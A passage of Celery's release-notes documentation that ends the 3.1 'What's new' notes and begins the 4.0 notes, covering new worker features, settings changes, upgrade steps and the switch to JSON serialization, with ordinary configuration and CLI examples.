``celery[librabbitmq]`` | transport (C amqp client) | +-------------+-------------------------+---------------------------+ The complete list with examples is found in the :ref:`bundles` section. ``subtask.__call__()`` now executes the task directly ----------------------------------------------------- A misunderstanding led to ``Signature.__call__`` being an alias of ``.delay`` but this doesn't conform to the calling API of ``Task`` which calls the underlying task method. This means that: .. code-block:: python @app.task def add(x, y): return x + y add.s(2, 2)() now does the same as calling the task directly: .. code-block:: pycon >>> add(2, 2) In Other News ------------- - Now depends on :ref:`Kombu 3.0 `. - Now depends on :pypi:`billiard` version 3.3. - Worker will now crash if running as the root user with pickle enabled. - Canvas: ``group.apply_async`` and ``chain.apply_async`` no longer starts separate task. That the group and chord primitives supported the "calling API" like other subtasks was a nice idea, but it was useless in practice and often confused users. If you still want this behavior you can define a task to do it for you. - New method ``Signature.freeze()`` can be used to "finalize" signatures/subtask. Regular signature: .. code-block:: pycon >>> s = add.s(2, 2) >>> result = s.freeze() >>> result >>> s.delay() Group: .. code-block:: pycon >>> g = group(add.s(2, 2), add.s(4, 4)) >>> result = g.freeze() >>> g() - Chord exception behavior defined (Issue #1172). From this version the chord callback will change state to FAILURE when a task part of a chord raises an exception. See more at :ref:`chord-errors`. - New ability to specify additional command line options to the worker and beat programs. The :attr:`@user_options` attribute can be used to add additional command-line arguments, and expects :mod:`optparse`-style options: .. code-block:: python from celery import Celery from celery.bin import Option app = Celery() app.user_options['worker'].add( Option('--my-argument'), ) See the :ref:`guide-extending` guide for more information. - All events now include a ``pid`` field, which is the process id of the process that sent the event. - Event heartbeats are now calculated based on the time when the event was received by the monitor, and not the time reported by the worker. This means that a worker with an out-of-sync clock will no longer show as 'Offline' in monitors. A warning is now emitted if the difference between the senders time and the internal time is greater than 15 seconds, suggesting that the clocks are out of sync. - Monotonic clock support. A monotonic clock is now used for timeouts and scheduling. The monotonic clock function is built-in starting from Python 3.4, but we also have fallback implementations for Linux and macOS. - :program:`celery worker` now supports a new :option:`--detach ` argument to start the worker as a daemon in the background. - :class:`@events.Receiver` now sets a ``local_received`` field for incoming events, which is set to the time of when the event was received. - :class:`@events.Dispatcher` now accepts a ``groups`` argument which decides a white-list of event groups that'll be sent. The type of an event is a string separated by '-', where the part before the first '-' is the group. Currently there are only two groups: ``worker`` and ``task``. A dispatcher instantiated as follows: .. code-block:: pycon >>> app.events.Dispatcher(connection, groups=['worker']) will only send worker related events and silently drop any attempts to send events related to any other group. - New :setting:`BROKER_FAILOVER_STRATEGY` setting. This setting can be used to change the transport fail-over strategy, can either be a callable returning an iterable or the name of a Kombu built-in failover strategy. Default is "round-robin". Contributed by Matt Wise. - ``Result.revoke`` will no longer wait for replies. You can add the ``reply=True`` argument if you really want to wait for responses from the workers. - Better support for link and link_error tasks for chords. Contributed by Steeve Morin. - Worker: Now emits warning if the :setting:`CELERYD_POOL` setting is set to enable the eventlet/gevent pools. The `-P` option should always be used to select the eventlet/gevent pool to ensure that the patches are applied as early as possible. If you start the worker in a wrapper (like Django's :file:`manage.py`) then you must apply the patches manually, for example by creating an alternative wrapper that monkey patches at the start of the program before importing any other modules. - There's a now an 'inspect clock' command which will collect the current logical clock value from workers. - `celery inspect stats` now contains the process id of the worker's main process. Contributed by Mher Movsisyan. - New remote control command to dump a workers configuration. Example: .. code-block:: console $ celery inspect conf Configuration values will be converted to values supported by JSON where possible. Contributed by Mher Movsisyan. - New settings :setting:`CELERY_EVENT_QUEUE_TTL` and :setting:`CELERY_EVENT_QUEUE_EXPIRES`. These control when a monitors event queue is deleted, and for how long events published to that queue will be visible. Only supported on RabbitMQ. - New Couchbase result backend. This result backend enables you to store and retrieve task results using `Couchbase`_. See :ref:`conf-couchbase-result-backend` for more information about configuring this result backend. Contributed by Alain Masiero. .. _`Couchbase`: https://www.couchbase.com - CentOS init-script now supports starting multiple worker instances. See the script header for details. Contributed by Jonathan Jordan. - ``AsyncResult.iter_native`` now sets default interval parameter to 0.5 Fix contributed by Idan Kamara - New setting :setting:`BROKER_LOGIN_METHOD`. This setting can be used to specify an alternate login method for the AMQP transports. Contributed by Adrien Guinet - The ``dump_conf`` remote control command will now give the string representation for types that aren't JSON compatible. - Function `celery.security.setup_security` is now :func:`@setup_security`. - Task retry now propagates the message expiry value (Issue #980). The value is forwarded at is, so the expiry time won't change. To update the expiry time you'd've to pass a new expires argument to ``retry()``. - Worker now crashes if a channel error occurs. Channel errors are transport specific and is the list of exceptions returned by ``Connection.channel_errors``. For RabbitMQ this means that Celery will crash if the equivalence checks for one of the queues in :setting:`CELERY_QUEUES` mismatches, which makes sense since this is a scenario where manual intervention is required. - Calling ``AsyncResult.get()`` on a chain now propagates errors for previous tasks (Issue #1014). - The parent attribute of ``AsyncResult`` is now reconstructed when using JSON serialization (Issue #1014). - Worker disconnection logs are now logged with severity warning instead of error. Contributed by Chris Adams. - ``events.State`` no longer crashes when it receives unknown event types. - SQLAlchemy Result Backend: New :setting:`CELERY_RESULT_DB_TABLENAMES` setting can be used to change the name of the database tables used. Contributed by Ryan Petrello. - SQLAlchemy Result Backend: Now calls ``enginge.dispose`` after fork (Issue #1564). If you create your own SQLAlchemy engines then you must also make sure that these are closed after fork in the worker: .. code-block:: python from multiprocessing.util import register_after_fork engine = create_engine(*engine_args) register_after_fork(engine, engine.dispose) - A stress test suite for the Celery worker has been written. This is located in the ``funtests/stress`` directory in the git repository. There's a README file there to get you started. - The logger named ``celery.concurrency`` has been renamed to ``celery.pool``. - New command line utility ``celery graph``. This utility creates graphs in GraphViz dot format. You can create graphs from the currently installed bootsteps: .. code-block:: console # Create graph of currently installed bootsteps in both the worker # and consumer name-spaces. $ celery graph bootsteps | dot -T png -o steps.png # Graph of the consumer name-space only. $ celery graph bootsteps consumer | dot -T png -o consumer_only.png # Graph of the worker name-space only. $ celery graph bootsteps worker | dot -T png -o worker_only.png Or graphs of workers in a cluster: .. code-block:: console # Create graph from the current cluster $ celery graph workers | dot -T png -o workers.png # Create graph from a specified list of workers $ celery graph workers nodes:w1,w2,w3 | dot -T png workers.png # also specify the number of threads in each worker $ celery graph workers nodes:w1,w2,w3 threads:2,4,6 # …also specify the broker and backend URLs shown in the graph $ celery graph workers broker:amqp:// backend:redis:// # …also specify the max number of workers/threads shown (wmax/tmax), # enumerating anything that exceeds that number. $ celery graph workers wmax:10 tmax:3 - Changed the way that app instances are pickled. Apps can now define a ``__reduce_keys__`` method that's used instead of the old ``AppPickler`` attribute. For example, if your app defines a custom 'foo' attribute that needs to be preserved when pickling you can define a ``__reduce_keys__`` as such: .. code-block:: python import celery class Celery(celery.Celery): def __init__(self, *args, **kwargs): super(Celery, self).__init__(*args, **kwargs) self.foo = kwargs.get('foo') def __reduce_keys__(self): return super(Celery, self).__reduce_keys__().update( foo=self.foo, ) This is a much more convenient way to add support for pickling custom attributes. The old ``AppPickler`` is still supported but its use is discouraged and we would like to remove it in a future version. - Ability to trace imports for debugging purposes. The :envvar:`C_IMPDEBUG` can be set to trace imports as they occur: .. code-block:: console $ C_IMDEBUG=1 celery worker -l info .. code-block:: console $ C_IMPDEBUG=1 celery shell - Message headers now available as part of the task request. Example adding and retrieving a header value: .. code-block:: python @app.task(bind=True) def t(self): return self.request.headers.get('sender') >>> t.apply_async(headers={'sender': 'George Costanza'}) - New :signal:`before_task_publish` signal dispatched before a task message is sent and can be used to modify the final message fields (Issue #1281). - New :signal:`after_task_publish` signal replaces the old :signal:`task_sent` signal. The :signal:`task_sent` signal is now deprecated and shouldn't be used. - New :signal:`worker_process_shutdown` signal is dispatched in the prefork pool child processes as they exit. Contributed by Daniel M Taub. - ``celery.platforms.PIDFile`` renamed to :class:`celery.platforms.Pidfile`. - MongoDB Backend: Can now be configured using a URL: - MongoDB Backend: No longer using deprecated ``pymongo.Connection``. - MongoDB Backend: Now disables ``auto_start_request``. - MongoDB Backend: Now enables ``use_greenlets`` when eventlet/gevent is used. - ``subtask()`` / ``maybe_subtask()`` renamed to ``signature()``/``maybe_signature()``. Aliases still available for backwards compatibility. - The ``correlation_id`` message property is now automatically set to the id of the task. - The task message ``eta`` and ``expires`` fields now includes timezone information. - All result backends ``store_result``/``mark_as_*`` methods must now accept a ``request`` keyword argument. - Events now emit warning if the broken ``yajl`` library is used. - The :signal:`celeryd_init` signal now takes an extra keyword argument: ``option``. This is the mapping of parsed command line arguments, and can be used to prepare new preload arguments (``app.user_options['preload']``). - New callback: :meth:`@on_configure`. This callback is called when an app is about to be configured (a configuration key is required). - Worker: No longer forks on :sig:`HUP`. This means that the worker will reuse the same pid for better support with external process supervisors. Contributed by Jameel Al-Aziz. - Worker: The log message ``Got task from broker …`` was changed to ``Received task …``. - Worker: The log message ``Skipping revoked task …`` was changed to ``Discarding revoked task …``. - Optimization: Improved performance of ``ResultSet.join_native()``. Contributed by Stas Rudakou. - The :signal:`task_revoked` signal now accepts new ``request`` argument (Issue #1555). The revoked signal is dispatched after the task request is removed from the stack, so it must instead use the :class:`~celery.worker.request.Request` object to get information about the task. - Worker: New :option:`-X ` command line argument to exclude queues (Issue #1399). The :option:`-X ` argument is the inverse of the :option:`-Q ` argument and accepts a list of queues to exclude (not consume from): .. code-block:: console # Consume from all queues in CELERY_QUEUES, but not the 'foo' queue. $ celery worker -A proj -l info -X foo - Adds :envvar:`C_FAKEFORK` environment variable for simple init-script/:program:`celery multi` debugging. This means that you can now do: .. code-block:: console $ C_FAKEFORK=1 celery multi start 10 or: .. code-block:: console $ C_FAKEFORK=1 /etc/init.d/celeryd start to avoid the daemonization step to see errors that aren't visible due to missing stdout/stderr. A ``dryrun`` command has been added to the generic init-script that enables this option. - New public API to push and pop from the current task stack: :func:`celery.app.push_current_task` and :func:`celery.app.pop_current_task``. - ``RetryTaskError`` has been renamed to :exc:`~celery.exceptions.Retry`. The old name is still available for backwards compatibility. - New semi-predicate exception :exc:`~celery.exceptions.Reject`. This exception can be raised to ``reject``/``requeue`` the task message, see :ref:`task-semipred-reject` for examples. - :ref:`Semipredicates ` documented: (Retry/Ignore/Reject). .. _v310-removals: Scheduled Removals ================== - The ``BROKER_INSIST`` setting and the ``insist`` argument to ``~@connection`` is no longer supported. - The ``CELERY_AMQP_TASK_RESULT_CONNECTION_MAX`` setting is no longer supported. Use :setting:`BROKER_POOL_LIMIT` instead. - The ``CELERY_TASK_ERROR_WHITELIST`` setting is no longer supported. You should set the :class:`~celery.utils.mail.ErrorMail` attribute of the task class instead. You can also do this using :setting:`CELERY_ANNOTATIONS`: .. code-block:: python from celery import Celery from celery.utils.mail import ErrorMail class MyErrorMail(ErrorMail): whitelist = (KeyError, ImportError) def should_send(self, context, exc): return isinstance(exc, self.whitelist) app = Celery() app.conf.CELERY_ANNOTATIONS = { '*': { 'ErrorMail': MyErrorMails, } } - Functions that creates a broker connections no longer supports the ``connect_timeout`` argument. This can now only be set using the :setting:`BROKER_CONNECTION_TIMEOUT` setting. This is because functions no longer create connections directly, but instead get them from the connection pool. - The ``CELERY_AMQP_TASK_RESULT_EXPIRES`` setting is no longer supported. Use :setting:`CELERY_TASK_RESULT_EXPIRES` instead. .. _v310-deprecations: Deprecation Time-line Changes ============================= See the :ref:`deprecation-timeline`. .. _v310-fixes: Fixes ===== - AMQP Backend: join didn't convert exceptions when using the json serializer. - Non-abstract task classes are now shared between apps (Issue #1150). Note that non-abstract task classes shouldn't be used in the new API. You should only create custom task classes when you use them as a base class in the ``@task`` decorator. This fix ensure backwards compatibility with older Celery versions so that non-abstract task classes works even if a module is imported multiple times so that the app is also instantiated multiple times. - Worker: Workaround for Unicode errors in logs (Issue #427). - Task methods: ``.apply_async`` now works properly if args list is None (Issue #1459). - Eventlet/gevent/solo/threads pools now properly handles :exc:`BaseException` errors raised by tasks. - :control:`autoscale` and :control:`pool_grow`/:control:`pool_shrink` remote control commands will now also automatically increase and decrease the consumer prefetch count. Fix contributed by Daniel M. Taub. - ``celery control pool_`` commands didn't coerce string arguments to int. - Redis/Cache chords: Callback result is now set to failure if the group disappeared from the database (Issue #1094). - Worker: Now makes sure that the shutdown process isn't initiated more than once. - Programs: :program:`celery multi` now properly handles both ``-f`` and :option:`--logfile ` options (Issue #1541). .. _v310-internal: Internal changes ================ - Module ``celery.task.trace`` has been renamed to :mod:`celery.app.trace`. - Module ``celery.concurrency.processes`` has been renamed to :mod:`celery.concurrency.prefork`. - Classes that no longer fall back to using the default app: - Result backends (:class:`celery.backends.base.BaseBackend`) - :class:`celery.worker.WorkController` - :class:`celery.worker.Consumer` - :class:`celery.worker.request.Request` This means that you have to pass a specific app when instantiating these classes. - ``EventDispatcher.copy_buffer`` renamed to :meth:`@events.Dispatcher.extend_buffer`. - Removed unused and never documented global instance ``celery.events.state.state``. - :class:`@events.Receiver` is now a :class:`kombu.mixins.ConsumerMixin` subclass. - :class:`celery.apps.worker.Worker` has been refactored as a subclass of :class:`celery.worker.WorkController`. This removes a lot of duplicate functionality. - The ``Celery.with_default_connection`` method has been removed in favor of ``with app.connection_or_acquire`` (:meth:`@connection_or_acquire`) - The ``celery.results.BaseDictBackend`` class has been removed and is replaced by :class:`celery.results.BaseBackend`. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/whatsnew-4.0.rst0000664000175000017500000022526100000000000020227 0ustar00asifasif00000000000000.. _whatsnew-4.0: =========================================== What's new in Celery 4.0 (latentcall) =========================================== :Author: Ask Solem (``ask at celeryproject.org``) .. sidebar:: Change history What's new documents describe the changes in major versions, we also have a :ref:`changelog` that lists the changes in bugfix releases (0.0.x), while older series are archived under the :ref:`history` section. Celery is a simple, flexible, and reliable distributed system to process vast amounts of messages, while providing operations with the tools required to maintain such a system. It's a task queue with focus on real-time processing, while also supporting task scheduling. Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. To read more about Celery you should go read the :ref:`introduction `. While this version is backward compatible with previous versions it's important that you read the following section. This version is officially supported on CPython 2.7, 3.4, and 3.5. and also supported on PyPy. .. _`website`: http://celeryproject.org/ .. topic:: Table of Contents Make sure you read the important notes before upgrading to this version. .. contents:: :local: :depth: 3 Preface ======= Welcome to Celery 4! This is a massive release with over two years of changes. Not only does it come with many new features, but it also fixes a massive list of bugs, so in many ways you could call it our "Snow Leopard" release. The next major version of Celery will support Python 3.5 only, where we are planning to take advantage of the new asyncio library. This release would not have been possible without the support of my employer, `Robinhood`_ (we're hiring!). - Ask Solem Dedicated to Sebastian "Zeb" Bjørnerud (RIP), with special thanks to `Ty Wilkins`_, for designing our new logo, all the contributors who help make this happen, and my colleagues at `Robinhood`_. .. _`Ty Wilkins`: http://tywilkins.com .. _`Robinhood`: https://robinhood.com Wall of Contributors -------------------- Aaron McMillin, Adam Chainz, Adam Renberg, Adriano Martins de Jesus, Adrien Guinet, Ahmet Demir, Aitor Gómez-Goiri, Alan Justino, Albert Wang, Alex Koshelev, Alex Rattray, Alex Williams, Alexander Koshelev, Alexander Lebedev, Alexander Oblovatniy, Alexey Kotlyarov, Ali Bozorgkhan, Alice Zoë Bevan–McGregor, Allard Hoeve, Alman One, Amir Rustamzadeh, Andrea Rabbaglietti, Andrea Rosa, Andrei Fokau, Andrew Rodionoff, Andrew Stewart, Andriy Yurchuk, Aneil Mallavarapu, Areski Belaid, Armenak Baburyan, Arthur Vuillard, Artyom Koval, Asif Saifuddin Auvi, Ask Solem, Balthazar Rouberol, Batiste Bieler, Berker Peksag, Bert Vanderbauwhede, Brendan Smithyman, Brian Bouterse, Bryce Groff, Cameron Will, ChangBo Guo, Chris Clark, Chris Duryee, Chris Erway, Chris Harris, Chris Martin, Chillar Anand, Colin McIntosh, Conrad Kramer, Corey Farwell, Craig Jellick, Cullen Rhodes, Dallas Marlow, Daniel Devine, Daniel Wallace, Danilo Bargen, Davanum Srinivas, Dave Smith, David Baumgold, David Harrigan, David Pravec, Dennis Brakhane, Derek Anderson, Dmitry Dygalo, Dmitry Malinovsky, Dongweiming, Dudás Ádám, Dustin J. Mitchell, Ed Morley, Edward Betts, Éloi Rivard, Emmanuel Cazenave, Fahad Siddiqui, Fatih Sucu, Feanil Patel, Federico Ficarelli, Felix Schwarz, Felix Yan, Fernando Rocha, Flavio Grossi, Frantisek Holop, Gao Jiangmiao, George Whewell, Gerald Manipon, Gilles Dartiguelongue, Gino Ledesma, Greg Wilbur, Guillaume Seguin, Hank John, Hogni Gylfason, Ilya Georgievsky, Ionel Cristian Mărieș, Ivan Larin, James Pulec, Jared Lewis, Jason Veatch, Jasper Bryant-Greene, Jeff Widman, Jeremy Tillman, Jeremy Zafran, Jocelyn Delalande, Joe Jevnik, Joe Sanford, John Anderson, John Barham, John Kirkham, John Whitlock, Jonathan Vanasco, Joshua Harlow, João Ricardo, Juan Carlos Ferrer, Juan Rossi, Justin Patrin, Kai Groner, Kevin Harvey, Kevin Richardson, Komu Wairagu, Konstantinos Koukopoulos, Kouhei Maeda, Kracekumar Ramaraju, Krzysztof Bujniewicz, Latitia M. Haskins, Len Buckens, Lev Berman, lidongming, Lorenzo Mancini, Lucas Wiman, Luke Pomfrey, Luyun Xie, Maciej Obuchowski, Manuel Kaufmann, Marat Sharafutdinov, Marc Sibson, Marcio Ribeiro, Marin Atanasov Nikolov, Mathieu Fenniak, Mark Parncutt, Mauro Rocco, Maxime Beauchemin, Maxime Vdb, Mher Movsisyan, Michael Aquilina, Michael Duane Mooring, Michael Permana, Mickaël Penhard, Mike Attwood, Mitchel Humpherys, Mohamed Abouelsaoud, Morris Tweed, Morton Fox, Môshe van der Sterre, Nat Williams, Nathan Van Gheem, Nicolas Unravel, Nik Nyby, Omer Katz, Omer Korner, Ori Hoch, Paul Pearce, Paulo Bu, Pavlo Kapyshin, Philip Garnero, Pierre Fersing, Piotr Kilczuk, Piotr Maślanka, Quentin Pradet, Radek Czajka, Raghuram Srinivasan, Randy Barlow, Raphael Michel, Rémy Léone, Robert Coup, Robert Kolba, Rockallite Wulf, Rodolfo Carvalho, Roger Hu, Romuald Brunet, Rongze Zhu, Ross Deane, Ryan Luckie, Rémy Greinhofer, Samuel Giffard, Samuel Jaillet, Sergey Azovskov, Sergey Tikhonov, Seungha Kim, Simon Peeters, Spencer E. Olson, Srinivas Garlapati, Stephen Milner, Steve Peak, Steven Sklar, Stuart Axon, Sukrit Khera, Tadej Janež, Taha Jahangir, Takeshi Kanemoto, Tayfun Sen, Tewfik Sadaoui, Thomas French, Thomas Grainger, Tomas Machalek, Tobias Schottdorf, Tocho Tochev, Valentyn Klindukh, Vic Kumar, Vladimir Bolshakov, Vladimir Gorbunov, Wayne Chang, Wieland Hoffmann, Wido den Hollander, Wil Langford, Will Thompson, William King, Yury Selivanov, Vytis Banaitis, Zoran Pavlovic, Xin Li, 許邱翔, :github_user:`allenling`, :github_user:`alzeih`, :github_user:`bastb`, :github_user:`bee-keeper`, :github_user:`ffeast`, :github_user:`firefly4268`, :github_user:`flyingfoxlee`, :github_user:`gdw2`, :github_user:`gitaarik`, :github_user:`hankjin`, :github_user:`lvh`, :github_user:`m-vdb`, :github_user:`kindule`, :github_user:`mdk`:, :github_user:`michael-k`, :github_user:`mozillazg`, :github_user:`nokrik`, :github_user:`ocean1`, :github_user:`orlo666`, :github_user:`raducc`, :github_user:`wanglei`, :github_user:`worldexception`, :github_user:`xBeAsTx`. .. note:: This wall was automatically generated from git history, so sadly it doesn't not include the people who help with more important things like answering mailing-list questions. Upgrading from Celery 3.1 ========================= Step 1: Upgrade to Celery 3.1.25 -------------------------------- If you haven't already, the first step is to upgrade to Celery 3.1.25. This version adds forward compatibility to the new message protocol, so that you can incrementally upgrade from 3.1 to 4.0. Deploy the workers first by upgrading to 3.1.25, this means these workers can process messages sent by clients using both 3.1 and 4.0. After the workers are upgraded you can upgrade the clients (e.g. web servers). Step 2: Update your configuration with the new setting names ------------------------------------------------------------ This version radically changes the configuration setting names, to be more consistent. The changes are fully backwards compatible, so you have the option to wait until the old setting names are deprecated, but to ease the transition we have included a command-line utility that rewrites your settings automatically. See :ref:`v400-upgrade-settings` for more information. Step 3: Read the important notes in this document ------------------------------------------------- Make sure you are not affected by any of the important upgrade notes mentioned in the following section. An especially important note is that Celery now checks the arguments you send to a task by matching it to the signature (:ref:`v400-typing`). Step 4: Upgrade to Celery 4.0 ----------------------------- At this point you can upgrade your workers and clients with the new version. .. _v400-important: Important Notes =============== Dropped support for Python 2.6 ------------------------------ Celery now requires Python 2.7 or later, and also drops support for Python 3.3 so supported versions are: - CPython 2.7 - CPython 3.4 - CPython 3.5 - PyPy 5.4 (``pypy2``) - PyPy 5.5-alpha (``pypy3``) Last major version to support Python 2 -------------------------------------- Starting from Celery 5.0 only Python 3.5+ will be supported. To make sure you're not affected by this change you should pin the Celery version in your requirements file, either to a specific version: ``celery==4.0.0``, or a range: ``celery>=4.0,<5.0``. Dropping support for Python 2 will enable us to remove massive amounts of compatibility code, and going with Python 3.5 allows us to take advantage of typing, async/await, asyncio, and similar concepts there's no alternative for in older versions. Celery 4.x will continue to work on Python 2.7, 3.4, 3.5; just as Celery 3.x still works on Python 2.6. Django support -------------- Celery 4.x requires Django 1.8 or later, but we really recommend using at least Django 1.9 for the new ``transaction.on_commit`` feature. A common problem when calling tasks from Django is when the task is related to a model change, and you wish to cancel the task if the transaction is rolled back, or ensure the task is only executed after the changes have been written to the database. ``transaction.atomic`` enables you to solve this problem by adding the task as a callback to be called only when the transaction is committed. Example usage: .. code-block:: python from functools import partial from django.db import transaction from .models import Article, Log from .tasks import send_article_created_notification def create_article(request): with transaction.atomic(): article = Article.objects.create(**request.POST) # send this task only if the rest of the transaction succeeds. transaction.on_commit(partial( send_article_created_notification.delay, article_id=article.pk)) Log.objects.create(type=Log.ARTICLE_CREATED, object_pk=article.pk) Removed features ---------------- - Microsoft Windows is no longer supported. The test suite is passing, and Celery seems to be working with Windows, but we make no guarantees as we are unable to diagnose issues on this platform. If you are a company requiring support on this platform, please get in touch. - Jython is no longer supported. Features removed for simplicity ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - Webhook task machinery (``celery.task.http``) has been removed. Nowadays it's easy to use the :pypi:`requests` module to write webhook tasks manually. We would love to use requests but we are simply unable to as there's a very vocal 'anti-dependency' mob in the Python community If you need backwards compatibility you can simply copy + paste the 3.1 version of the module and make sure it's imported by the worker: https://github.com/celery/celery/blob/3.1/celery/task/http.py - Tasks no longer sends error emails. This also removes support for ``app.mail_admins``, and any functionality related to sending emails. - ``celery.contrib.batches`` has been removed. This was an experimental feature, so not covered by our deprecation timeline guarantee. You can copy and pase the existing batches code for use within your projects: https://github.com/celery/celery/blob/3.1/celery/contrib/batches.py Features removed for lack of funding ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ We announced with the 3.1 release that some transports were moved to experimental status, and that there'd be no official support for the transports. As this subtle hint for the need of funding failed we've removed them completely, breaking backwards compatibility. - Using the Django ORM as a broker is no longer supported. You can still use the Django ORM as a result backend: see :ref:`django-celery-results` section for more information. - Using SQLAlchemy as a broker is no longer supported. You can still use SQLAlchemy as a result backend. - Using CouchDB as a broker is no longer supported. You can still use CouchDB as a result backend. - Using IronMQ as a broker is no longer supported. - Using Beanstalk as a broker is no longer supported. In addition some features have been removed completely so that attempting to use them will raise an exception: - The ``--autoreload`` feature has been removed. This was an experimental feature, and not covered by our deprecation timeline guarantee. The flag is removed completely so the worker will crash at startup when present. Luckily this flag isn't used in production systems. - The experimental ``threads`` pool is no longer supported and has been removed. - The ``force_execv`` feature is no longer supported. The ``celery worker`` command now ignores the ``--no-execv``, ``--force-execv``, and the ``CELERYD_FORCE_EXECV`` setting. This flag will be removed completely in 5.0 and the worker will raise an error. - The old legacy "amqp" result backend has been deprecated, and will be removed in Celery 5.0. Please use the ``rpc`` result backend for RPC-style calls, and a persistent result backend for multi-consumer results. We think most of these can be fixed without considerable effort, so if you're interested in getting any of these features back, please get in touch. **Now to the good news**... New Task Message Protocol ------------------------- .. :sha:`e71652d384b1b5df2a4e6145df9f0efb456bc71c` This version introduces a brand new task message protocol, the first major change to the protocol since the beginning of the project. The new protocol is enabled by default in this version and since the new version isn't backwards compatible you have to be careful when upgrading. The 3.1.25 version was released to add compatibility with the new protocol so the easiest way to upgrade is to upgrade to that version first, then upgrade to 4.0 in a second deployment. If you wish to keep using the old protocol you may also configure the protocol version number used: .. code-block:: python app = Celery() app.conf.task_protocol = 1 Read more about the features available in the new protocol in the news section found later in this document. .. _v400-upgrade-settings: Lowercase setting names ----------------------- In the pursuit of beauty all settings are now renamed to be in all lowercase and some setting names have been renamed for consistency. This change is fully backwards compatible so you can still use the uppercase setting names, but we would like you to upgrade as soon as possible and you can do this automatically using the :program:`celery upgrade settings` command: .. code-block:: console $ celery upgrade settings proj/settings.py This command will modify your module in-place to use the new lower-case names (if you want uppercase with a "``CELERY``" prefix see block below), and save a backup in :file:`proj/settings.py.orig`. .. _latentcall-django-admonition: .. admonition:: For Django users and others who want to keep uppercase names If you're loading Celery configuration from the Django settings module then you'll want to keep using the uppercase names. You also want to use a ``CELERY_`` prefix so that no Celery settings collide with Django settings used by other apps. To do this, you'll first need to convert your settings file to use the new consistent naming scheme, and add the prefix to all Celery related settings: .. code-block:: console $ celery upgrade settings proj/settings.py --django After upgrading the settings file, you need to set the prefix explicitly in your ``proj/celery.py`` module: .. code-block:: python app.config_from_object('django.conf:settings', namespace='CELERY') You can find the most up to date Django Celery integration example here: :ref:`django-first-steps`. .. note:: This will also add a prefix to settings that didn't previously have one, for example ``BROKER_URL`` should be written ``CELERY_BROKER_URL`` with a namespace of ``CELERY`` ``CELERY_BROKER_URL``. Luckily you don't have to manually change the files, as the :program:`celery upgrade settings --django` program should do the right thing. The loader will try to detect if your configuration is using the new format, and act accordingly, but this also means you're not allowed to mix and match new and old setting names, that's unless you provide a value for both alternatives. The major difference between previous versions, apart from the lower case names, are the renaming of some prefixes, like ``celerybeat_`` to ``beat_``, ``celeryd_`` to ``worker_``. The ``celery_`` prefix has also been removed, and task related settings from this name-space is now prefixed by ``task_``, worker related settings with ``worker_``. Apart from this most of the settings will be the same in lowercase, apart from a few special ones: ===================================== ========================================================== **Setting name** **Replace with** ===================================== ========================================================== ``CELERY_MAX_CACHED_RESULTS`` :setting:`result_cache_max` ``CELERY_MESSAGE_COMPRESSION`` :setting:`result_compression`/:setting:`task_compression`. ``CELERY_TASK_RESULT_EXPIRES`` :setting:`result_expires` ``CELERY_RESULT_DBURI`` :setting:`result_backend` ``CELERY_RESULT_ENGINE_OPTIONS`` :setting:`database_engine_options` ``-*-_DB_SHORT_LIVED_SESSIONS`` :setting:`database_short_lived_sessions` ``CELERY_RESULT_DB_TABLE_NAMES`` :setting:`database_db_names` ``CELERY_ACKS_LATE`` :setting:`task_acks_late` ``CELERY_ALWAYS_EAGER`` :setting:`task_always_eager` ``CELERY_ANNOTATIONS`` :setting:`task_annotations` ``CELERY_MESSAGE_COMPRESSION`` :setting:`task_compression` ``CELERY_CREATE_MISSING_QUEUES`` :setting:`task_create_missing_queues` ``CELERY_DEFAULT_DELIVERY_MODE`` :setting:`task_default_delivery_mode` ``CELERY_DEFAULT_EXCHANGE`` :setting:`task_default_exchange` ``CELERY_DEFAULT_EXCHANGE_TYPE`` :setting:`task_default_exchange_type` ``CELERY_DEFAULT_QUEUE`` :setting:`task_default_queue` ``CELERY_DEFAULT_RATE_LIMIT`` :setting:`task_default_rate_limit` ``CELERY_DEFAULT_ROUTING_KEY`` :setting:`task_default_routing_key` ``-"-_EAGER_PROPAGATES_EXCEPTIONS`` :setting:`task_eager_propagates` ``CELERY_IGNORE_RESULT`` :setting:`task_ignore_result` ``CELERY_TASK_PUBLISH_RETRY`` :setting:`task_publish_retry` ``CELERY_TASK_PUBLISH_RETRY_POLICY`` :setting:`task_publish_retry_policy` ``CELERY_QUEUES`` :setting:`task_queues` ``CELERY_ROUTES`` :setting:`task_routes` ``CELERY_SEND_TASK_SENT_EVENT`` :setting:`task_send_sent_event` ``CELERY_TASK_SERIALIZER`` :setting:`task_serializer` ``CELERYD_TASK_SOFT_TIME_LIMIT`` :setting:`task_soft_time_limit` ``CELERYD_TASK_TIME_LIMIT`` :setting:`task_time_limit` ``CELERY_TRACK_STARTED`` :setting:`task_track_started` ``CELERY_DISABLE_RATE_LIMITS`` :setting:`worker_disable_rate_limits` ``CELERY_ENABLE_REMOTE_CONTROL`` :setting:`worker_enable_remote_control` ``CELERYD_SEND_EVENTS`` :setting:`worker_send_task_events` ===================================== ========================================================== You can see a full table of the changes in :ref:`conf-old-settings-map`. Json is now the default serializer ---------------------------------- The time has finally come to end the reign of :mod:`pickle` as the default serialization mechanism, and json is the default serializer starting from this version. This change was :ref:`announced with the release of Celery 3.1 `. If you're still depending on :mod:`pickle` being the default serializer, then you have to configure your app before upgrading to 4.0: .. code-block:: python task_serializer = 'pickle' result_serializer = 'pickle' accept_content = {'pickle'} The Json serializer now also supports some additional types: - :class:`~datetime.datetime`, :class:`~datetime.time`, :class:`~datetime.date` Converted to json text, in ISO-8601 format. - :class:`~decimal.Decimal` Converted to json text. - :class:`django.utils.functional.Promise` Django only: Lazy strings used for translation etc., are evaluated and conversion to a json type is attempted. - :class:`uuid.UUID` Converted to json text. You can also define a ``__json__`` method on your custom classes to support JSON serialization (must return a json compatible type): .. code-block:: python class Person: first_name = None last_name = None address = None def __json__(self): return { 'first_name': self.first_name, 'last_name': self.last_name, 'address': self.address, } The Task base class no longer automatically register tasks ---------------------------------------------------------- The :class:`~@Task` class is no longer using a special meta-class that automatically registers the task in the task registry. Instead this is now handled by the :class:`@task` decorators. If you're still using class based tasks, then you need to register these manually: .. code-block:: python class CustomTask(Task): def run(self): print('running') CustomTask = app.register_task(CustomTask()) The best practice is to use custom task classes only for overriding general behavior, and then using the task decorator to realize the task: 